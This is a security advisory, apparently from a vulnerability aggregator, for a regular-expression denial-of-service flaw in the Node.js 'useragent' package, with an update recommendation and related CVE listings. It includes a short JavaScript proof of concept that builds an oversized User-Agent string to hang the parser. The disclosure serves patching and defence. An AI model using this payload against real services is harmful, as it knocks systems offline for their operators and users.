Lucene search
Mathias MadsenNODEJS:312HistoryFeb 09, 2017 - 8:11 p.m.
ReDoS via long UserAgent header
2017-02-0920:11:10
Mathias Madsen
www.npmjs.com
41
0.001 Low
EPSS
Percentile
47.1%
Overview
Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.
Proof of Concept
var useragent = require('useragent');
var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
Recommendation
Update to version 2.1.13 or later.
References
Related
prion
prion
Code injection
2018-06-04 19:29:00
nvd
nvd
CVE-2017-16030
2018-06-04 19:29:01
osv
osv
ReDoS via long UserAgent header in useragent
2018-07-24 19:59:13
cvelist
cvelist
CVE-2017-16030
2018-04-26 00:00:00
github
github
ReDoS via long UserAgent header in useragent
2018-07-24 19:59:13
cve
cve
CVE-2017-16030
2018-06-04 19:29:01
redhatcve
redhatcve
CVE-2017-16030
2018-06-08 02:49:55
veracode
veracode
Regular Expression Denial Of Service (ReDoS)
2017-04-17 03:10:25